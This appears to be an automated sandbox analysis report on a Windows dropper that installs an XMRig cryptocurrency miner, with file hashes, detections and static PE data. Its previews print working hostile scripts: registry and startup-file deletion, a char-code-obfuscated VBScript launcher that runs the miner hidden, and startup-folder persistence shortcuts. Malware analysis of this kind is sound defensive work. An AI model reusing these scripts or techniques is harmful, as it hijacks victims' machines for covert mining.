Preview:	@echo off..TASKKILL /IM wscript.exe /F..TASKKILL /IM wscript.exe /F..TASKKILL /IM wscript.exe /F..TASKKILL /IM wscript.exe /F..timeout /t 1..START delreg.vbs..timeout /t 2..START killroaming.vbs..START killstatrup.vbs..START deltemp.vbs..START start.vbs..START services.exe..START AudioClip.exe..timeout /t 2..START Replace32640.vbs..START mavis9080.vbe....

C:\Users\user\AppData\Roaming\01Atodo\delreg.vbs

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	141
Entropy (8bit):	4.920287241640909
Encrypted:	false
SSDEEP:	3:9cNAWdgUdTAmPFEm81GX83AjJLKD9so3KRfyM1K7eD5:9cNAWdgU22NiPhtuH1jF
MD5:	889F3B032F5FCD1EEEED0F9D34ACCA7E
SHA1:	75DEDFD9C3668AA97E556D9314BE2BE564A384B3
SHA-256:	57D9E0E1C8A65388F6E597C0889289E3E6EF44F352F8805177AA7F56484A01E4
SHA-512:	9A1CB7255EA92826BB7C2BBC4E448B73891266FB4B5D016F8F2AE2B662C138F1FF16D4AFA36896301F1B76974437760CA8013B9D61D8A7FA912898FA48512BCB
Malicious:	false
Preview:	On Error Resume Next..Set WshShell = CreateObject("Wscript.Shell")..WshShell.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\")

C:\Users\user\AppData\Roaming\01Atodo\deltemp.vbs

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3219
Entropy (8bit):	5.0525235157075175
Encrypted:	false
SSDEEP:	48:kJ0Xet5dLubjVk0DD2qoI3SZAwd3bKWOYHKd6lYqj9gI6KqSy64yw:kJ0XY5NuxXIAgOYg6lYqBgID3y
MD5:	B9B23737E61DBFFE6B205B0ED6B4CB3A
SHA1:	AA3C0C2BBA88979D1B3C4B3DDAA76581A48A1228
SHA-256:	64145BE6307AA73B4A6BEFC71C7636993C865C5C3789787AD157EABA4666195C
SHA-512:	F9B9AFA79B2E4B25AA1BC5C36873C8DF6CDD73E7AC61C2D98CA9BE26E5D3962CD7332DFE8A45966262685ABA036D9F88D013B1CB2EF1E82FEC81027CBB48DD02
Malicious:	false
Preview:	'==========================================================================..'..' VBScript Source File -- Created with SAPIEN Technologies PrimalScript 2009..'..' NAME: Delete Temp Files..'..' AUTHOR: Mohammed Alyafae , ..' DATE : 9/21/2011..'..' COMMENT: this script delete all user and system temporary files and folder ..' also delete Internet Temporary files ..'==========================================================================....Option Explicit..Dim objShell..Dim objSysEnv,objUserEnv..Dim strUserTemp..Dim strSysTemp..Dim userProfile,TempInternetFiles..Dim OSType....Set objShell=CreateObject("WScript.Shell")....Set objSysEnv=objShell.Environment("System")..Set objUserEnv=objShell.Environment("User")....strUserTemp= objShell.ExpandEnvironmentStrings(objUserEnv("TEMP"))..strSysTemp= objShell.ExpandEnvironmentStrings(objSysEnv("TEMP"))..userProfile = objShell.ExpandEnvironmentStrings("%userprofile%")....DeleteTemp strUserTemp 'delete user temp files....DeleteTemp strSysTemp '

C:\Users\user\AppData\Roaming\01Atodo\install.vbs

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	137
Entropy (8bit):	4.798434545327188
Encrypted:	false
SSDEEP:	3:9cNAWdgUdTAmPFEm8nh3QANX4EfszETDcNUqJajaPOUC:9cNAWdgU22NqhvX7szETYNUqOUC
MD5:	7FDBCCF5AFA6576A94C90EA04605533E
SHA1:	2A68604CC9D9D0690E17811685018F4EDBFB2908
SHA-256:	1E052F8AFA8FCFB4FFF2E72704DC88AC03A7F160C4C677A1F7497A96F59CDD28
SHA-512:	77780D1C96857F2F28323D574EA998B9E3BF23E6DB1A876DDFB28A7219B6B8D860DFC2656FC93F7CF01CC853FC23CC7469E71E19C256F378F0081A221A7AFBC4
Malicious:	false
Preview:	On Error Resume Next..Set WshShell = CreateObject("WScript.Shell")..WshShell.Run chr(34) & "del.bat" & Chr(34), 0..Set WshShell = Nothing

C:\Users\user\AppData\Roaming\01Atodo\killroaming.vbs

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	318
Entropy (8bit):	5.038781454327607
Encrypted:	false
SSDEEP:	6:9cNAWdgUsRN1nmtMi4+hhJ4JpI4J3wUnCfAiMotDMN+7yQbAL4J91nc:9vWdUT1U4+hhJ4ZG+wptwAdbAL4/1c
MD5:	7DA00CB4403C31F74C65FE10A653BEF0
SHA1:	5A9CA17527613CAF044769407E081E3F68A046B8
SHA-256:	86101EFB6D1EF81669FCCC9A371573EA4CFE9EB812C39457C03A7FC16344AA61
SHA-512:	9343CE89194221114A6BB442A8E177E9EDF765E176AF7096C3D31924CBDBC2C188802C08BECA84E146E8D9236FE01E5FB9FC04941A51833242F4464683FBA8E2
Malicious:	false
Preview:	On Error Resume Next..Const sArchivoParaBorrar = "*.vbs".. ..Set oShell = WScript.CreateObject("WScript.Shell")..Dim sAppdataFolder: sAppdataFolder = oShell.ExpandEnvironmentStrings("%APPDATA%").. ..Set objFSO = CreateObject("Scripting.FileSystemObject")..objFSO.DeleteFile(sAppdataFolder & "\" & sArchivoParaBorrar)

C:\Users\user\AppData\Roaming\01Atodo\killstatrup.vbs

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	393
Entropy (8bit):	4.977423680463393
Encrypted:	false
SSDEEP:	6:9cNAWdgUsRN1nmt6iGNhtKoMmw6wFMvxapdNDMN+7ynKuQJtbAOy4G1nc:9vWdUT14Z56Lvx2NwAHDJtbAj4G1c
MD5:	DF98B267BD0C56A6E6BF780E700A6741
SHA1:	8BC3F65091D17E0382DB29CAB919A888AAFC534A
SHA-256:	F91639EF9FEEBB6473898CA630CCB6F884BBBCBF0162C11340E3F88AEE0AF50B
SHA-512:	C9D72FD024CC38401B3096E7D03F2FEE7511CEAC53EA11CA07C8C82B4BAC8DF9EEC990C0E2F5DAC527DCE0ABEA7FEED7C9796A0254B4226CCE559A081C422700
Malicious:	false
Preview:	On Error Resume Next..Const sArchivoParaBorrar = "*.vbs".. ..Set oShell = CreateObject("Shell.Application")..Set oStartupFolder = oShell.NameSpace(&H7)..If oStartupFolder Is Nothing Then WScript.Quit().. ..Set objFSO = CreateObject("Scripting.FileSystemObject")..Set objFolder = objFSO.GetFolder(oStartupFolder.Self.Path)..objFSO.DeleteFile(oStartupFolder.Self.Path & "\" & sArchivoParaBorrar)

C:\Users\user\AppData\Roaming\01Atodo\mavis9080.vbe

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	data
Category:	dropped
Size (bytes):	315579
Entropy (8bit):	6.249579829257124
Encrypted:	false
SSDEEP:	6144:JT22+YsFXR/GJCvPJizgRlFNWR8HPAT8J3ug6MPZxYKP4c82YS5d:EpEiPJizmNJvAT8JDBxYKVhfH
MD5:	0A1A8BCBC5CE2A4FBD8799E745BE34C9
SHA1:	9B6BD2432945FA4B914E9004EC48566F2A9E5A7B
SHA-256:	88189F8AE4457BBE73F4CA0686C0920895371417177B38F07ED1916F4FEC81BB
SHA-512:	B75BC2305FCE3F8869BA7D232D4B1D5EC54B64AFE59083163AEE00C48C09C67818B5FD4775F27B8222607305A64164DA4B6A506049BBBFEB80B49D85918CECF5
Malicious:	false
Preview:	'<[encrypted with Ecu-Sec VBS crypter coded by BrutuS skype: brutus.8]>..']][][][[]][[]][[[[[][[][][[[[[[[[]]][[[[[[]]][[][]]]]]]][]][[[[]]]]][[[[][[]][[[[][[[][[][]][[][[]]]]]]]]]][]][[][]]][][]][][[[[]]][[]][[][][][]]]]]][]][[][[[[[]][[][][]]][][][]][[]]][][[][[]]]][][]]]]][][]][[[][][]]][[][[][[[[]][]][[[[[][][]]]]]]]]]]][[[]][]]]]][[]][]][][][[][[[[[[[[[][][[[][]]]][[[[]]][][[]]][][[]][[[[][][[]]]][]][[]][[[]][][][[]]]][]][]][]]]]][[[[[[][[[[[[[[][[]]]]][]]]][][][][[][][[[[]]][][]][][]]][[]]][][[]]]][[][]]]]]]]][][[]]][[[][][][]]][[]][]]][][][[[]][[]]][[[[[[]]]]][[[[][][]]]][[]]]][][[]]]][]][][][][[[]][[[[[[]][[[]][[[[[[[[]]]][][][[][[[]]]][][]]][]]][]][[[[[[[]][][[[][[[][]][]]]][[][][]]][[[][][][][[[][[[][]][][][]]][][]]][]][][[[[][[][[[[][[][][[]]][[[][[[[]][]]]]][[][][[[[]]][[][]]]]][][]][][[[]][[]][[]]]][]][[[][]]]]][[[[][]]][[[][[[][[[[][[[][][[]][[][][[]]][[[[]][]]][[][[[][[]][][][[[][]][][[[[[]][]]][][[[]]][][]]][]]][][]][[[[]][][]]][[][]][][[[][[][[]][]][]][[][[][]][[][[]]]

C:\Users\user\AppData\Roaming\01Atodo\services.exe

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1955840
Entropy (8bit):	7.9932349553069475
Encrypted:	true
SSDEEP:	49152:4T2J7b0APMjDuLtMBzOdTNQbqllCkus5QhWeVIl:4T00KIOzQbi5Xl
MD5:	0C8E76FF6BA1CC33C2A37928A1E9642B
SHA1:	5DD3CD71E36EFCBC7863BE17813AAE5946041995
SHA-256:	E39F18D40EE6863FBCA7417CE301F11BAA0AFCF3E918C13B452545696E9A0CE1
SHA-512:	AD5AAA4C934F9A287A3BC03D8276C25EDD4AC22255164CA2F82082E983840B3D43A2292E30885ACC468BDAEAFCE43E513AE5ACC7B08C38F6D46F5F4D08CC91FB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 23%, Browse Antivirus: ReversingLabs, Detection: 77%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m.nb................................. ........@.. .......................@............@.....................................O.......`.................... ....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...`...........................@..@.reloc....... ......................@..B........................H........t...t...........E..............................................6.(.....o.......0..!........,..{....,..{....o........(.........................0..-........s....}.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o!....s....o#....s....o%....s....o'....s....o)....s....o+....s....o-....s....o/....s....o1....s....o3....s....o5....s....o7....s....o9....s....o;

C:\Users\user\AppData\Roaming\01Atodo\start.bat

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	31
Entropy (8bit):	4.042433003725894
Encrypted:	false
SSDEEP:	3:mKDDBM1mvuQIv:hm1mvfIv
MD5:	8FE3035B918A542403C9A99DA1472401
SHA1:	1BC70F5E0C6378466CD15F23060F56650358D997
SHA-256:	6B6136CFE4CA2FAACED4F8156C9486FBD8B92C25D18E6FA48ABD95994359B537
SHA-512:	138D6FEFB6F0ABD0DE04D9920646033CBF753F0B2DE90D7EF873D0BAEAB449957F453E7EC225D5FB9CAA9B0B11A9D7513283899F8AF3516208C131FE0C653D0E
Malicious:	false
Preview:	@echo off..wininit.exe..pause..

C:\Users\user\AppData\Roaming\01Atodo\start.vbs

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	555
Entropy (8bit):	4.172517599652226
Encrypted:	false
SSDEEP:	12:MrrNLpq3HMyTjhQno0mSp07nthQRiBSG8Wdq3HYDDO4bGkiPL:MrrNLpq3vjDXt8SXq3+O4bGkiPL
MD5:	319BCB91B164073E30F03BACAE28F273
SHA1:	5C0F60DC238DE6A99CF5B796AB92EF69872AE5E5
SHA-256:	C7CB75F32849AD1B531376834B1D09DF7503D6E4E37C3834F0354B61C71B1E56
SHA-512:	DA0E6E312AFE6C5622981479F6800F6486CA47631A508D2B5E08DB844319A628D6FCC64E59225F80BA8B62A473258423886C61459F2F664D8350C2D300354E48
Malicious:	false
Preview:	A = Array(103,110,105,104,116,111,78,32,61,32,108,108,101,104,83,104,115,87,32,116,101,83,10,13,48,32,44,41,52,51,40,114,104,67,32,38,32,34,116,97,98,46,116,114,97,116,115,34,32,38,32,41,52,51,40,114,104,99,32,110,117,82,46,108,108,101,104,83,104,115,87,10,13,41,34,108,108,101,104,83,46,116,112,105,114,99,83,87,34,40,116,99,101,106,98,79,101,116,97,101,114,67,32,61,32,108,108,101,104,83,104,115,87,32,116,101,83)..C = Array ("W","r","h","C")..For i = UBound(a) To 0 Step -1..O = O & eval(C(3) & C(2) & C(1) & C(0) & "(A(i))")..Next..ExecuteGlobal O..

C:\Users\user\AppData\Roaming\01Atodo\wininit.exe

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5465600
Entropy (8bit):	6.690168561527196
Encrypted:	false
SSDEEP:	98304:vsE3+83BZM7IaS+LQzrIir31CK0TW7KKZk5O3oIkXliTGoS:n+81gKUW725O350iGoS
MD5:	606CE310D75EE688CBFFAEAE33AB4FEE
SHA1:	B9AFF434FD737D8009A8D92CD34B5E4C4C0117A8
SHA-256:	75F92B9A79C8F680CF1230653E3AE6C97D694AFC0F7EEC88F92CF6B6F3F38B50
SHA-512:	825E8B7D794FDFDB04B6F153EB220A45F12C4243D62D0D304744539D5F56CDFE660A78AF150756D87CCFA0B0BBF73CDCE5A35341120372012FDD9300CE2D5B63
Malicious:	true
Yara Hits:	Rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, Description: Detects XMRIG crypto coin miners, Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, Author: Florian Roth Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, Author: Joe Security Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 34%, Browse Antivirus: ReversingLabs, Detection: 77%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........^.d.^.d.^.d...g.R.d...a...d.8...Z.d...`.M.d...g.T.d...a...d...`.G.d...e.K.d.^.e.+.d..`.;.d..m.E.d..g.Z.d..._.d.^.._.d..f._.d.Rich^.d.........................PE..d....XLb.........."......8..<E.....D.4........@..............................}...........`.................................................L2O.......\|..Y...`z.,............@}.......L.......................L.(.....L.8............@8..............................text...8(8......8................. ..`.rdata.......@8.......8.............@..@.data.....*..`O......BO.............@....pdata..,....`z......>P.............@..@_RANDOMXV....`\|......6R.............@..`_SHA3_25@....p\|......DR.............@..`_TEXT_CN.&....\|..(...NR.............@..`_TEXT_CN......\|......vR.............@..`_RDATA........\|.......R.............@..@.rsrc....Y....\|..Z....R.............@..@.reloc.......@}.......R.............@..B

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe

Download File

Process:	C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	48128
Entropy (8bit):	4.328310677437976
Encrypted:	false
SSDEEP:	768:8vWBNcW49rYpBGtDkUhW+37M+pWnwSMzzUlKq0NMxhrml8cHIbeMv9C5OQcASvYv:rBNq9jtD7UwPq0OHS6cHIGVxSvYJ2pz0
MD5:	1F22C6DBDF4806A6ADB969CB6E548400
SHA1:	E2C757824AAB59BAC5061428F3AB3F90497AB96A
SHA-256:	9A0A3E5296478E7822D92BF8B2C4AF3E18203C6E65A47BE5C65594F376576733
SHA-512:	7510BD7FA66F447999E116F42C5C86D799D4CCD036BBE407124F0369946DBCF136EA251BC56C94AED4418CAAE2A845A8006FD9DEE069724F1D65728D23A021FB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 34%, Browse Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E.Yb................................. ........@.. ....................... ............@.....................................W.......@...........................L................................................ ............... ..H............text....... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H.......X%...............$...............................................0...........(.....o.......(.....+......0.............s....... ....o.......(....o.......(....o......s........o.....s...........i.X................io.........X...........(......o................-..o........o................-..o..................-..o..........+....(....F.@.........7.l....................0...........(.....o.......(.....+..*....0.............s....... ....o.......(....o.......(....o.....s...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe.lnk

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sat Jun 18 01:40:42 2022, mtime=Sat Jun 18 01:40:42 2022, atime=Sun May 1 17:46:05 2022, length=1955840, window=hide
Category:	dropped
Size (bytes):	962
Entropy (8bit):	4.974407050561016
Encrypted:	false
SSDEEP:	12:8mws1U43y+jCoHwY//79sWuLe/XOntjijmFOjAQHmzHZhmeMJbHNpQEQMm:8mZiIFH3T9LIe/OtejmMAjzPmRFtVm
MD5:	5A90BE5A35E305FB7F7E0ECAD3A6291D
SHA1:	E23190A4C0E83AD373EAEB8099101CEDC297A8E5
SHA-256:	16A34EB8214D1DB30BBE3DF547ADC1BEF461E9D3F1B0B157F3EEABF296F46655
SHA-512:	0C47414CB8D8CD8CE4033BE8BD2CA10412DE3428FAA7F92396A3FB346788F5EDA7347BFCFA6269D0E15705AA1B57A7EBFE2959F6F5AF7C092FD30F026C35F878
Malicious:	false
Preview:	L..................F.... ................./....]............................:..DG..Yr?.D..U..k0.&...&...........-.......3...q.........t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..T.......Y.....................R..A.p.p.D.a.t.a...B.V.1......T....Roaming.@.......NM..T.......Y.....................m@.R.o.a.m.i.n.g.....V.1......T....01Atodo.@.......T...T.............................m@.0.1.A.t.o.d.o.....f.2......T. .services.exe..J.......T...T................................s.e.r.v.i.c.e.s...e.x.e.......c...............-.......b.............C~.....C:\Users\user\AppData\Roaming\01Atodo\services.exe..#.....\.....\.....\.....\.....\.0.1.A.t.o.d.o.\.s.e.r.v.i.c.e.s...e.x.e.'.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.0.1.A.t.o.d.o.`.......X.......849224...........!a..%.H.VZAj...W..s.........W...!a..%.H.VZAj...W..s.........W..E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs.lnk

Download File

Process:	C:\Users\user\Desktop\2rVBokoc2C.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sat Jun 18 01:40:43 2022, mtime=Sat Jun 18 01:40:43 2022, atime=Fri Oct 9 21:04:50 2020, length=555, window=hide
Category:	dropped
Size (bytes):	943
Entropy (8bit):	4.963894691120949
Encrypted:	false
SSDEEP:	24:8maciIFH3T9LIelhnZzTAA0iLFtLx2x+m:8mFiIFje+vz0pit
MD5:	0720B61D45522844D0FA8AFA7122EFF1
SHA1:	45B5B7BED5AF84ECB9443197CE77E26D14F1EA35
SHA-256:	19D73F4A964BE05D654728AAB4A0F7EFCA8BF78F59BD343F6257595A4EC6EFD9
SHA-512:	EFD5EBE1E0FE190D9573F9560C1D007544838D86861A635100D038BBAD5BE3B177111A164304C99C89DD5E31411A32408BBA48B82C225ADA76863C05008AB853
Malicious:	true
Preview:	L..................F.... ....s).....s).....Wh5....+.........................:..DG..Yr?.D..U..k0.&...&...........-.......3...q.........t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..T.......Y.....................R..A.p.p.D.a.t.a...B.V.1......T....Roaming.@.......NM..T.......Y.....................m@.R.o.a.m.i.n.g.....V.1......T....01Atodo.@.......T...T............................-...0.1.A.t.o.d.o.....\.2.+...IQ.. .start.vbs.D.......T...T...............................s.t.a.r.t...v.b.s.......`...............-......._.............C~.....C:\Users\user\AppData\Roaming\01Atodo\start.vbs.. .....\.....\.....\.....\.....\.0.1.A.t.o.d.o.\.s.t.a.r.t...v.b.s.'.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.0.1.A.t.o.d.o.`.......X.......849224...........!a..%.H.VZAj...j..s.........W...!a..%.H.VZAj...j..s.........W..E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.929389695013884
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2rVBokoc2C.exe
File size:	4514981
MD5:	c37ffea9b9ba78c03a9296b73d3d55bd
SHA1:	bde857ecd190681eef6024acb3c82dcf9913b865
SHA256:	f924ddf42e5f1b8102e774b68fff7e40c217acee2f0fe1c44453766af97f419b
SHA512:	aee75fab3b4c95a5be7457c7d73d26e31b180629ab3a7c14139e2aaa91d7af4354d600bd7eaa98f7583528f8eca76b5dc1a5167f41f59e2a544ce1165a42446f
SSDEEP:	98304:pYk117PZyi7kg1FxNxwQHu4AOeeLVs4GN041pHC4ucztobtGHd2wGERgo:HkGFCQWOe7N04W49MPTERl
TLSH:	96262301B1D48032E2E677351F20E6705B3A7D907A38C61AA3F85D5BB7BF5836A31762
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	30b4018808010100

Static PE Info

General

Entrypoint:	0x41ea80
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x5EF47EA0 [Thu Jun 25 10:38:24 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007FA19CCEE529h
jmp 00007FA19CCEDF2Dh
cmp ecx, dword ptr [0043D668h]
jne 00007FA19CCEE0A5h
ret
jmp 00007FA19CCEE6AEh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FA19CCE0F57h
mov dword ptr [esi], 00434560h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00434568h
mov dword ptr [ecx], 00434560h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 00434548h
push eax
call 00007FA19CCF1247h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FA19CCEE0ACh
push 0000000Ch
push esi
call 00007FA19CCED674h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FA19CCE0ED2h
push 0043A6A4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FA19CCF0946h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FA19CCEE028h
push 0043A8FCh
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FA19CCF0929h
int3

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3b800	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b834	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x38f58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9b000	0x2264	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x39aa0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x344e8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x32000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3ada4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x30f2a	0x31000	False	0.5837751116071429	data	6.704420140465974	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x32000	0xa5f2	0xa600	False	0.457996046686747	data	5.259297003766902	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x23720	0x1000	False	0.367431640625	data	3.705679035284865	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x61000	0x188	0x200	False	0.443359375	data	3.299508867679483	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x62000	0x38f58	0x39000	False	0.46659128289473684	data	5.3982230424547355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9b000	0x2264	0x2400	False	0.7727864583333334	data	6.556746947659253	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
PNG	0x626a4	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States
PNG	0x631ec	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States
RT_ICON	0x64798	0xcc65	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x71400	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0x81c28	0x94a8	data
RT_ICON	0x8b0d0	0x5488	data
RT_ICON	0x90558	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
RT_ICON	0x94780	0x25a8	data
RT_ICON	0x96d28	0x10a8	data
RT_ICON	0x97dd0	0x988	data
RT_ICON	0x98758	0x468	GLS_BINARY_LSB_FIRST
RT_DIALOG	0x98bc0	0x286	data	English	United States
RT_DIALOG	0x98e48	0x13a	data	English	United States
RT_DIALOG	0x98f84	0xec	data	English	United States
RT_DIALOG	0x99070	0x12e	data	English	United States
RT_DIALOG	0x991a0	0x338	data	English	United States
RT_DIALOG	0x994d8	0x252	data	English	United States
